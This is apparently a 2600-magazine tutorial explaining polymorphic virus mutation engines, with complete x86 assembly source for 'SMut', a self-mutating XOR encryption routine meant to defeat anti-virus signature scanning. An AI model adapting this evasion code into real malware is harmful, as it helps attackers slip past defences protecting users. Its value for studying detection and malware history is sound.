Mutation Engine Demystified

by Tio Mate Jones

"Premature optimization is the root of all programming evil."  - Donald Knuth

"Structured programming is the result of a structured mind."  - Unknown

The above quotes hold true for many virus "authors" nowadays.  In attempting to make their creations smaller and streamlined under the conviction that their virii will be more stealth-like, they are often missing obvious stealth techniques.

To conceal themselves from anti-virus scanners, many virii use simple forms of encryption, where the only unencrypted portions are the decryption routines themselves.  The rest is scrambled somehow.  The problem is that the decryption segment becomes a recognizable signature for the virus, mainly because the decryptors are coded in a structured fashion.

One way to combat that is to use self-modifying code. Rather than read from a data area containing decryption information (which is changed regularly), a virus can write the changes directly into the decryption mechanism.

An improvement on this theme is to use a mutation engine, which generates a different decryption segment for each virus spawned, thus making scanning for one of these creatures much harder.

Mutation engines (most notably Dark Avenger's MtE) are shrouded in a mystical cloud of silence.  Some of the warning literature has described the MtE as using "military grade encryption" rather than being what it is: mutating code.  (Anti-virus professionals are understandably reluctant to discuss a method that would make their jobs more difficult; as it is, getting ahold of a simple virus like Tiny is a labor itself.)

For the non-professional in pursuit of knowledge, this presents a problem.  Fortunately, there have been some descriptions of the MtE out there, and they are useful enough for anyone with a minimum of assembly language skills.

In fact, I found the theory simple enough that I was able to write a small mutation engine (which I call "SMut") overnight.

The SMut Engine contains only an encryption/decryption routine and a mutation routine, as well as the initialization coding.  After initializing, a virus using SMut would decrypt itself, mutate itself, and then do all its other operations.

The principle behind a mutation engine is simple: there are many ways to code the same function.  Processors have interchangeable registers.  Though they are usually meant for specific functions, one still has much leeway in coding.  (For simplicity, the SMut Engine I'll be discussing here will focus mainly on this method.)

Other methods take advantage of synonyms and redundant code:

inc X could also be add X, 1 or add X, 2/dec X or add X, 10/sub X, 9 or sub X, -1.

The decryptor can also be padded with non-sense code like nop (no operation), add Y, 0, or Z, Z etc.

Let's take a look at a sample encryption/decryption routine.  (Note:  If your machine uses a different processor from the Intel 80x86 family, that's O.K.  You can still use this article to learn the theory.)

ENCR:
                           ; Similar to one used by Leprosy-B Virus
  p0: push bx              ; save registers used by routine
  p1: push ax              ; i86 doesn’t let you push 8-bit registers
  z0: mov bx, OFFSET START ; start addr of code to encrypt

LOOP:
  z1: mov ah, [bx]         ; Get indexed byte
  z2: xor ah, 0FFh         ; XOR it
  z3: mov [bx], ah         ; Put indexed byte
  z4: inc bx               ; increment index
  nop                      ; Pad extra bytes for mutation?
  nop
  z5: cmp bx, OFFSET ENDCD ; is the index at the end of code?
  z6: jle LOOP             ; if not, keep going
  p2: pop ax               ; Restore registers
  p3: pop bx
  ret                      ; Return

START:                     ; Encrypted Code inside here
ENDCD:

Notice the z0..z6 and p0..p3 labels.  Those are for the mutation engine, which will make the changes directly to the code.  This routine isn't the most efficient method, but it's the easiest to mutate: the obvious choices are the registers.

BX can be replaced by SI or DI.  AH can be replaced by AL, CL, CH, DL, CH.  If we don't use BX, we can also replace AH by BL or BH... thus we have 16 possible combinations.

We can also change the encryption value as well, which many virii do.  Rather than using a separate data space, we can affect the change directly on the code by saving it to z2+2 (rather than use xor ah, Enc_Value, where Enc_Value is a memory location: that is too structured!).

Another mutable part of the code is the loop method.  We can change z4 to add bx, 1 or sub bx, 0FFh.  We can also switch the nop with the inc bx.  If we're not too uptight about the last byte not being encrypted, we can change one byte at z6 to jnz LOOP.  Another thing to change would be to reverse the order, decrementing BX down from ENDCD to START instead.

We've examined several possibilities for generating hundreds of variations, without even changing the size of our encryption routine.

For simplicity, we'll look at mutating the registers (the other methods of mutating code can be easier).  Note the differences in the assembly of the following (on Intel 80x86 machines):

Assembled (hex)     Source

8A 27               mov ah, [bx]
8A 07               mov al, [bx]
8B 07               mov ax, [bx]
8A 0F               mov cl, [bx]
8A 37               mov dh, [bx]

We can see some patterns here.  Certain bits in the code indicate which registers are used, their size (8- or 16-bits), and what addressing mode.  Most processors work this way.  Our mutation engine set up the initial byte, "OR" in the chosen registers and bingo!  We've mutated the code.

In the case of Intel 80x86 processors, many of the op-codes are followed by a special data byte formatted like so: mmrrrxxx, where each letter stands for one bit.

mm refers to a two-bit mode.  rrr is the register.  xxx actually means r/m, which varies depending on the addressing mode and op-code.  Notice each register is expressed using three bits:

rrr     8-bit    16-bit

000       AL       AX 
001       CL       CX 
010       DL       DX 
011       BL       BX 
100       AH       SP 
101       CH       BP 
110       DH       SI 
111       BH       DI

Of course it's a bit more complicated (no pun intended).  Some op-codes, depending on the addressing mode (mm) will expect a certain number of data bytes following (on the Intel 80x86 it may be up to four or five).  You'll need to experiment on your own and learn (if you already don't know) assembly language from a good primer.

If you program on a machine which uses a different type of processor (such as the MOS 650x or Motorola 6800 families) you can use similar principles for writing a mutation engine.

One note about anti-viral utilities: the prevalence of mutation engines eventually can improve system security methods if the focus is shifted from scanning for recognizable code to heuristic scanners which will look for possible decryption engines, and operating systems which watch from the background for anything "funny" happening (this may save users from poorly written software as well as virii... moreso maybe).

The principles behind this mutation engine are not only useful for virus writing, however.  They can be employed for data-security and copy protection schemes, artificial life simulations (such as Terra, in which a virtual memory is populated by self-replicating and evolving/mutating "life forms"), and perhaps even machines that can write programs or improve their own code.

The Listing

(This is probably not the most efficient coding... then again, see the quotes that this article started off with.)

As it is now, the listing should be assembled and linked, then made into a COM file (using EXE2BIN or the /t option on TLINK).

Load the program using: DEBUG SMUT.COM

Examine the coding portion of the encryption routine, run the program (using the g command) and examine the encryption routine again.  It should have mutated.

This program is a good shell for experimenting with mutation engines.  As you make modifications, you can test and debug them safely.  You'll need to examine the mutation engine a bit.  The bit-shifting makes it look a bit cryptic.  However, optimization might make it less readable.

If it makes no sense, take out your guide to Intel 80x86 code, and study it well.

SMut.asm:

; SMut.ASM v2.4B * A Small Mutation Engine Demo 
; by Tio Mate Jones 

codesize equ endofcode-pgstart+1      ; Size of program 
encrsize equ endofcode-startofcode+1  ; Size of encrypted code 

mutant 
  segment byte public 'code'
  ;assume cs: mutant, ds: mutant,
  ;ss: mutant, es: mutant 
  org 100h 

; This is merely some demonstrationcode used for development.... 
; This is NOT the source-code for a virus. 
; It only includes a sample encryption routine and a sample mutation engine. 

given proc near 

start: 
  jmp pgstart 

exlib: 

  int 20h ; Insert appropriate code here...
  nop

pgstart:
  call init 

init:
  pop si                     ; Where am I?
  sub si, offset init
  mov ax, si                 ; Plug values directly into encryption/decryption
  add ax, offset startofcode ; routine
  mov [si+offset Z0+1], ax   ; Allows for relocatable code!! 
  add ax, encrsize 
  mov [si+offset Z5+2], ax 

mtest: 
  call mutate  ; Test the mutation.... 
  call encrypt 
  call encrypt ; Test the encryption/decryption routine. If it works (it does),
               ; Smut can be run an infinite number of times 
  int 20h      ; DOS exit 

; This is the encryption/decryption routine
encrypt:
  P0: push bx  ; Save registers used
  P1: push ax
  Z0: mov bx, offset startofcode

;It may look inefficient, but it's easy to mutate
xorloop:
  Z1: mov ah, [bx]
  Z2: xor ah, 0
  Z3: mov [bx], ah
  Z4: inc bx
  Z5: cmp bx, offset endofcode
      jle xorloop
  P2: pop ax ; Restore registers
  P3: pop bx
      ret

; Other code to be encrypted begins here... 
; This is the mutation engine: (This demo will only produce sixteen possible
; variations, and thus is not a threat to western civilization.)
startofcode:

mutate: 

getrand: 
  mov ah, 2Ch ; Get a "random" number 
  int 21h     ; Call DOS GetTime routine 

mut: 
  ; DH = operating register (CAL, AH, BL, BH, CL, CH, DL or DH) 
  ; DL = index register (SI or DI) and Encryption Value 
  add [si+offset Z2+2], dl ; Change the Encryption Value 
  jz getrand ; if zero, get a new value... 
  and dx, 0702h ; Only need DH=0..7 and DL=0 or 2 
  shr dl, 1 ; Compensate for inaccurate hundredths of sec. 
  or dl, 6  ; Convert to mmrrrr/m format 
  mov al, 40h 
  or al, dl 
  mov [si+offset Z4], al 
  mov al, 0F0h
  or al, dh 
  mov [si+offset Z2+1], al ; Mutate XOR 
  mov ch, dh ; save DH 
  shl dh, 1 ; convert to mmrrrr/m format 
  shl dh, 1 
  shl dh, 1 
  mov al, dh 
  and dl, 1 ; adjust format 
  or dl, 4 
  or al, dl 
  mov [si+offset Z1+1], al ; Mutate MOV 
  mov [si+offset Z3+1], al 
  or dl, 6 
  mov al, 0B8h
  or al, dl 
  mov [si+offset Z0], al 

cmp_mut: 
  mov al, 0F8h ; Mutate CMP 
  or al, dl 
  mov [si+offset Z5+1], al 

pp_mut: 
  mov ax, 5050h ; Mutate PUSH, POP 
  mov dh, ch ; restore DH 
  and dh, 3 
  or ax, dx 
  mov [si+offset P0], ax 
  mov ax, 5858h 
  or al, dh 
  or ah, dl 
  mov [si+offset P2], ax 
  ret 

; Put more encrypted coding or data here... 

;tagline:
;  label word 
;  db 'SMut v2.4B'

; Any fool who blindly inserts this mutation engine into a virus which 
; he or she spreads into the wild shall spend all of eternity in the 
; netherworld being pummeled with blunt objects by little gnomes who 
; sing horrid top forty songs off key...

endofcode: 
  given endp 
  mutant ends 
  end given 

Code: SMut.asm  v2.4B

Code: SMut.com  v2.4B

Return to $2600 Index